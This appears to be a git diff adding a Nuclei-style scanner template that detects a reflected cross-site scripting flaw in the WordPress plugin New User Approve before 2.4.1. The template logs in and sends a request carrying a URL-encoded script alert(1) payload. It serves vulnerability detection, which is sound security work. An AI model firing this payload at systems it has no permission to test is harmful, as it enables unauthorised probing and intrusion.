diff --git a/vulnerabilities/wordpress/new-user-approve-xss.yaml b/vulnerabilities/wordpress/new-user-approve-xss.yaml new file mode 100644 index 0000000000..7efb421348 --- /dev/null +++ b/vulnerabilities/wordpress/new-user-approve-xss.yaml @@ -0,0 +1,45 @@ +id: new-user-approve-xss + +info: + name: New User Approve < 2.4.1 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/17f99601-f5c9-4300-9b4a-6d75fa7ab94a + - https://wordpress.org/plugins/new-user-approve + metadata: + verified: true + tags: wp,wordpress,xss,authenticated,wp-plugin + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/index.php?a%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '?a">&new-user-approve-settings' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200